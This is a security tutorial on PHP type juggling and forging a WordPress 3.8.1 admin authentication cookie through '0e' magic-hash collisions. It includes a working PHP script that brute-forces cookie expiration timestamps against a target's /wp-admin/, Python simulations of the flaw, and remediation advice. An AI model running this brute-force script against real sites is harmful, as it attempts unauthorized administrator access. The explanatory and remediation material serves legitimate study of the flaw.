PHP Weak type: WordPress cookie forgery

Source: Internet
Author: User
Tags: hmac

1 PHP Weak Typing

PHP is a weakly typed language: a variable's type is converted automatically according to the context in which it is used. When PHP compares values with == and !=, it converts the operands to a common type first; === and !== compare both type and value and never convert.

<?php
    $a = 3;
    $b = '3vic';
    var_dump($a == $b);   // true  (loose comparison: '3vic' is converted to the integer 3)
    var_dump($a != $b);   // false
    var_dump($a === $b);  // false (strict comparison: an int and a string differ in type)
    var_dump($a !== $b);  // true
?>

Description: when PHP converts a string to an integer it takes the leading numeric part of the string ('3vic' becomes 3); a string that does not begin with a digit becomes 0 ('vic' becomes 0). The results above hold for PHP 5 and PHP 7. PHP 8 changed the rules: an integer compared with a string that is not fully numeric (such as '3vic') is compared as a string, so 3 == '3vic' is false there, while the numeric-string comparisons used later on this page still behave as described.

2 WordPress Code

    • WordPress 3.8.1 and WordPress 3.8.2: the relevant code difference

<?php
// WordPress 3.8.1
if ( $hmac != $hash ) {}

// WordPress 3.8.2
if ( hash_hmac( 'md5', $hmac, $key ) !== hash_hmac( 'md5', $hash, $key ) ) {}
?>
    • Cookie composition

For access to the backend the server validates only one of the cookies, shown below:

wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin| 1433403595|cf50f3b50eed94dd0fdc3d3ea2c7bbb; Path=/wp-admin; Domain=www.test.ichunqiu; HttpOnly

The cookie name has the format wordpress_ + md5(siteurl), where siteurl is the URL of the WordPress site; here the site is http://www.test.ichunqiu and its MD5 is c47f4a97d0321c1980bb76fc00d1e78f. The other cookies can be left out. The cookie value consists of three fields separated by |:

    Field      | User name  | Expiration time | Hash value the server gives the client after a successful login
    Variable   | $username  | $expiration     | $hmac
    Cookie     | admin      | 1433403595      | cf50f3b50eed94dd0fdc3d3ea2c7bbb

    • Analyzing the login authentication

Code: wp-includes/pluggable.php, lines 543-549

<?php
    $key  = wp_hash( $username . $pass_frag . '|' . $expiration, $scheme );
    $hash = hash_hmac( 'md5', $username . '|' . $expiration, $key );
    if ( $hmac != $hash ) {
        do_action( 'auth_cookie_bad_hash', $cookie_elements );
        return false;
    }

Among the variables used by this code, $username and $expiration are taken from the client cookie and can be changed by editing it. Because the user name has to stay fixed (the target account is admin), only $expiration is practically under our control, so changing $expiration is the way to change the $hash the server computes.

    • Combining the PHP hash-comparison defect with the WordPress analysis

There are several ways for $hmac == $hash to be true: the two strings are identical, or $hmac is the integer 0 and $hash is a string beginning with a letter (a string with no leading digit converts to 0). Changing the $hmac field of the cookie to 0 on the client and writing var_dump($hmac); die(); above the line if ( $hmac != $hash ) { shows that $hmac arrives as the string '0', not the integer 0, so there is no way to make it be treated as an integer. Two numeric strings are still compared numerically, though, as the following code shows:

<?php
    var_dump( '0' == '0e156464513131' ); // true
?>

'0e156464513131' is read as 0 times 10 to the power of 156464513131, which is 0, so $hash compares equal to '0' whenever it begins with 0e and every following character is a digit. We can therefore set the client cookie to something like wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 and keep changing the expiration time (the 1433403595 field) until the server-side $hash collides with that form; once the computed $hash is 0e followed only by digits, the check passes. The chosen expiration time has to lie in the future, because wp_validate_auth_cookie() rejects an expired cookie before it reaches the hash comparison. When a collision succeeds, set the cookie in the browser and open the backend address directly to log in.
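The comparison rules from section 1 and the numeric-string trick used here can be checked outside a PHP interpreter with the following Python emulation of PHP 5/7 loose comparison. This is an added example, not code from the original article or from PHP itself; it covers only the int/string cases the article relies on (fully numeric strings, leading-numeric strings such as '3vic', and the 0e exponent form), not every PHP comparison rule.

```python
import re

# A fully numeric string as PHP 7 sees it: optional leading whitespace, sign,
# integer or decimal part, optional exponent ('0e156464513131' qualifies).
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")
# The leading numeric prefix PHP uses when a number meets a non-numeric string.
_LEADING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def is_numeric_string(s: str) -> bool:
    return _NUMERIC.match(s) is not None


def string_to_number(s: str) -> float:
    """(int)/(float) cast of a string: its leading number, or 0 if it starts with no digit."""
    m = _LEADING.match(s)
    return float(m.group(0)) if m else 0.0


def php_loose_eq(a, b) -> bool:
    """Emulate PHP 5/7 `$a == $b` for int/float and str operands."""
    if isinstance(a, str) and isinstance(b, str):
        # Two strings are compared numerically only when BOTH are numeric strings,
        # otherwise byte for byte.  This is why '0' == '0e...digits' is true
        # while '0' == 'abc' is false.
        if is_numeric_string(a) and is_numeric_string(b):
            return float(a) == float(b)
        return a == b
    if isinstance(a, str):
        a, b = b, a
    if isinstance(b, str):
        # Number vs string: the string is converted to a number (leading numeric
        # part, or 0), so 3 == '3vic' and 0 == 'vic' are both true.
        return float(a) == string_to_number(b)
    return float(a) == float(b)


def php_strict_eq(a, b) -> bool:
    """Emulate `$a === $b`: same type and same value, nothing converted."""
    return type(a) is type(b) and a == b


if __name__ == "__main__":
    for x, y in [(3, "3vic"), (0, "vic"), ("0", "vic"), ("0", "0e156464513131")]:
        print(f"{x!r} == {y!r}: {php_loose_eq(x, y)}   ===: {php_strict_eq(x, y)}")
```

The string-vs-string branch is the one the forgery depends on: the cookie's $hmac field is always a string, so only a $hash that is itself a numeric string equal to zero can satisfy the loose comparison.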

3 Test Scripts

By changing the expiration time in the client cookie we repeatedly try to reach the backend until we find a timestamp that gets us in, which forges a login cookie.

<?php
/*
 This script tests for the WordPress 3.8.1 cookie forgery vulnerability.
 Two values are passed in:
   the WordPress home page     $host
   the administrator user name $root
*/
header("Content-type:text/html;charset=utf-8");

$host = 'http://xxx.xxx.xxx'; // home address, without a trailing '/'
$root = 'user';               // administrator user name

$url = $host . '/wp-admin/';  // admin address
$sitehash = md5($host);       // cookie name suffix: md5(siteurl); must match the site's siteurl option, which can differ from the home URL

echo "\nwelcome\n\n";
// forge the cookie by brute-forcing the expiration timestamp
for ($i = 1500000000; $i < 1600000000; $i++) {
    $cookie = "wordpress_" . $sitehash . "=" . $root . "|" . $i . "|0;"; // construct the cookie
    $header = array(
        "Content-type:application/x-www-form-urlencoded",
        'User-Agent:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;)',
        "Cookie:" . $cookie,
    );

    $curl = curl_init();                                             // start a curl session
    curl_setopt($curl, CURLOPT_URL, $url);                           // the address to be accessed
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);                   // follow redirects
    curl_setopt($curl, CURLOPT_AUTOREFERER, 1);                      // set Referer automatically
    curl_setopt($curl, CURLOPT_HTTPGET, true);                       // send a plain GET request
    curl_setopt($curl, CURLOPT_HTTPHEADER, $header);                 // send the headers built above, including the cookie
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);                   // return the response as a string
    curl_setopt($curl, CURLOPT_HEADER, 0);                           // do not include response headers in the output
    curl_setopt($curl, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
    $tmpInfo = curl_exec($curl);                                     // perform the request
    if (curl_errno($curl)) {
        echo 'Errno ' . curl_error($curl);
    }
    curl_close($curl);                                               // close the curl session

    // match the result: the marker is text from the dashboard welcome panel,
    // so adjust it to the installed language if the site is not in English
    if (strstr($tmpInfo, "We've got a couple of links for you to get started")) {
        echo "\n" . 'Success: ' . $cookie . "\n";
        break;
    } else {
        echo 'Fail: ' . $cookie . "\n";
    }
}
?>

Description: in theory about one 32-character MD5 value in three hundred million begins with 0e followed by 30 digits ((1/16)^2 × (10/16)^30 ≈ 2.9 × 10^-9), so the chance of hitting a usable $expiration is extremely low.

5 Remediation

When comparing hashes in PHP, change == and != to === and !==, or run both values through a keyed hash again before the strict comparison, as WordPress 3.8.2 does with hash_hmac('md5', $hmac, $key) !== hash_hmac('md5', $hash, $key). On PHP 5.6 and later, hash_equals() performs a strict, timing-safe comparison for this purpose.
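The brute force in the test script of section 3, its probability estimate, and the 3.8.2 fix described here can be exercised offline with the following Python simulation of the relevant part of wp_validate_auth_cookie(). This is an added example, not the article's script and not WordPress code: SAMPLE_KEY is a constructed stand-in for $key (WordPress derives the real one with wp_hash() from the password fragment and the site's secret keys, so an attacker does not know it), the cookie format username|expiration|hmac is the one described in section 2, and the loose-comparison helper is limited to the shapes a hex digest can take.

```python
import hashlib
import hmac
import re

# Constructed stand-in for $key; the real value comes from wp_hash(), which
# mixes in $pass_frag and the site's secret keys and is unknown to the attacker.
SAMPLE_KEY = b"constructed-sample-key"

# The only shapes a 32-character hex digest can take that PHP's `==` treats as a
# numeric string: decimal digits, optionally followed by 'e' and more digits.
_NUMERIC_HEX = re.compile(r"^\d+(e\d+)?$")
# A digest that compares loosely equal to the forged value '0': all zeros, or
# zeros followed by an exponent (0e... = 0 * 10^n = 0).
_ZERO_NUMERIC = re.compile(r"^0+(e\d+)?$")


def server_hash(username: str, expiration: int, key: bytes = SAMPLE_KEY) -> str:
    """$hash = hash_hmac('md5', $username . '|' . $expiration, $key)."""
    return hmac.new(key, f"{username}|{expiration}".encode(), hashlib.md5).hexdigest()


def php_loose_eq_hex(a: str, b: str) -> bool:
    """PHP 5/7 `==` for strings of hex characters: numeric when both parse as numbers."""
    if _NUMERIC_HEX.match(a) and _NUMERIC_HEX.match(b):
        return float(a) == float(b)
    return a == b


def hash_is_zero_numeric(digest: str) -> bool:
    """True exactly when `'0' != $digest` is false under loose comparison."""
    return _ZERO_NUMERIC.match(digest) is not None


def _parse(cookie: str):
    username, expiration, client_hmac = cookie.split("|")
    return username, int(expiration), client_hmac


def vulnerable_check(cookie: str, now: int, key: bytes = SAMPLE_KEY) -> bool:
    """WordPress 3.8.1: `if ( $hmac != $hash ) return false;` after the expiry check."""
    username, expiration, client_hmac = _parse(cookie)
    if expiration < now:  # an expired cookie is rejected before the hash is compared
        return False
    return php_loose_eq_hex(client_hmac, server_hash(username, expiration, key))


def fixed_check(cookie: str, now: int, key: bytes = SAMPLE_KEY) -> bool:
    """WordPress 3.8.2: hash_hmac('md5', $hmac, $key) !== hash_hmac('md5', $hash, $key)."""
    username, expiration, client_hmac = _parse(cookie)
    if expiration < now:
        return False
    expected = server_hash(username, expiration, key)
    left = hmac.new(key, client_hmac.encode(), hashlib.md5).hexdigest()
    right = hmac.new(key, expected.encode(), hashlib.md5).hexdigest()
    # Re-hashing both sides with the secret key gives two digests the attacker cannot
    # steer into a numeric form; compare_digest is the strict, timing-safe
    # counterpart of PHP's hash_equals().
    return hmac.compare_digest(left, right)


def forge_cookie(username: str, expiration: int) -> str:
    return f"{username}|{expiration}|0"


def search_forgeable_expiration(username: str, start: int, count: int, key: bytes = SAMPLE_KEY):
    """Offline form of the article's loop: the first expiration in [start, start + count)
    whose server-side hash is zero-numeric, so username|expiration|0 passes the 3.8.1 check."""
    for expiration in range(start, start + count):
        if hash_is_zero_numeric(server_hash(username, expiration, key)):
            return expiration
    return None


def magic_hash_probability() -> float:
    """P(32 hex chars are '0e' + 30 decimal digits) = (1/16)^2 * (10/16)^30, about 1 in 340 million."""
    return (1 / 16) ** 2 * (10 / 16) ** 30


if __name__ == "__main__":
    now = 1433403595
    print(f"expected attempts per usable expiration: {1 / magic_hash_probability():,.0f}")
    print("forgeable expiration in a 100000-wide window:",
          search_forgeable_expiration("admin", now, 100_000))
    honest = f"admin|{now + 3600}|{server_hash('admin', now + 3600)}"
    print("honest cookie, 3.8.1:", vulnerable_check(honest, now), " 3.8.2:", fixed_check(honest, now))
    print("forged cookie, 3.8.2:", fixed_check(forge_cookie("admin", now + 3600), now))
```

Because the hit rate is about one in 340 million, the search over a small window normally returns None; the point of the simulation is that the 3.8.1 check has a reachable success condition at all, while the 3.8.2 check has none for a forged value regardless of what the server-side hash looks like.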

Study Note: http://ichunqiu.com/course/167
